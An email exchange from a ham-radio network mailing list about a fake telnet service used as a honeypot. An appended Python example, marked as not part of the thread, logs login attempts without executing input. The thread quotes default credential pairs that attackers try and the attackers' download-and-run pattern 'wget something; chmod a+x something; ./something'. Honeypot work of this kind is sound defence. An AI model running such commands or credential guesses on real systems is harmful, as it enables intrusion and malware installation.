Rob, if you wouldn't mind emailing me privately (jim@photojim.ca) - unless discussing it here is OK - I wouldn't mind hearing how you did the fake telnetd. I think that's a brilliant idea.
Jim VE5EIS
-----Original Message-----
From: 44Net [mailto:44net-bounces+jim=photojim.ca@hamradio.ucsd.edu] On Behalf Of Rob Janssen
Sent: September-29-16 1:10 PM
To: 44net@hamradio.ucsd.edu
Subject: Re: [44net] Security - Telnet (port tcp/23)

I have a fake telnetd running on one of my systems that simply presents the user with a login prompt and logs what is being typed, and it shows endless connections trying things like root/12345 root/password admin/admin etc. They probably get into certain routers or other systems like that, then install some trojan that does further scanning. This is also indicated by certain loggings where they apparently believe they got logged in and then send a long string like "wget something; chmod a+x something; ./something" or similar.
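
One way to build the kind of fake telnetd described above, as an added example that is not Rob's code and not part of the original thread. The port (2323), the per-connection limits, the JSON log format and the names `clean` and `handle` are all assumptions made for illustration.

```python
import asyncio, json, time

MAX_LINE, MAX_LINES, IDLE = 256, 20, 30  # assumed limits: chars/line, lines/conn, idle seconds

def clean(raw: bytes) -> str:
    """Strip telnet IAC negotiation and non-printable bytes before logging."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b == 0xFF:  # IAC; WILL/WONT/DO/DONT (251-254) carry one option byte
            i += 3 if raw[i + 1:i + 2] and 251 <= raw[i + 1] <= 254 else 2
            continue
        if 32 <= b < 127:  # keep printable ASCII only, so log lines stay one line
            out.append(chr(b))
        i += 1
    return "".join(out)[:MAX_LINE]

async def handle(reader, writer, log=print):
    """Alternate login/password prompts and log every line typed.
    Nothing is ever authenticated and nothing received is ever executed."""
    peer = writer.get_extra_info("peername")
    prompts = ("login: ", "Password: ")
    try:
        for n in range(MAX_LINES):
            writer.write(prompts[n % 2].encode())
            await writer.drain()
            raw = await asyncio.wait_for(reader.readline(), IDLE)
            if not raw:  # client closed the connection
                break
            log(json.dumps({"ts": int(time.time()), "peer": str(peer),
                            "prompt": prompts[n % 2].strip(": "), "typed": clean(raw)}))
            if n % 2:  # a full login/password pair was received
                writer.write(b"\r\nLogin incorrect\r\n")
    except (asyncio.TimeoutError, ConnectionError, ValueError):
        pass  # idle timeout, reset, or a line longer than the stream limit
    finally:
        writer.close()

async def main(port=2323):  # unprivileged port; tcp/23 can be redirected to it
    server = await asyncio.start_server(handle, "0.0.0.0", port, limit=4096)
    async with server:
        await server.serve_forever()

if __name__ == "__main__":
    asyncio.run(main())
```

Clients that send commands blindly after their credentials, like the "wget something; chmod a+x something; ./something" string mentioned above, show up in the log as text typed at a later login prompt.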